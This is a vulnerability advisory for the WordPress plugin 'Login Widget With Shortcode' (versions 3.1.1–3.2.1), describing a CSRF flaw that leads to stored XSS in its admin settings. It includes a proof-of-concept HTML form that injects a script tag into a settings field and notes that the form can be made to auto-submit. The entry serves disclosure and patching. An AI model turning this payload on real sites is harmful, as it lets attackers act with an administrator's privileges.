vendor:
Login Widget With Shortcode
by:
dxw
6,8
CVSS
MEDIUM
CSRF/XSS
352
CWE
Product Name: Login Widget With Shortcode
Affected Version From: 3.1.1
Affected Version To: 3.2.1
Patch Exists: YES
Related CWE: Awaiting assignment
CPE: a:wordpress:login_widget_with_shortcode
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020
CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript). <form method="POST" action="http://localhost/wp-admin/options-general.php?page=login_widget_afo"> <input type="text" name="custom_style_afo" value="</textarea><script>alert(1)</script>"> <input type="text" name="option" value="login_widget_afo_save_settings"> <input type="submit"> </form>
Mitigation:
Upgrade to version 3.2.1 or later.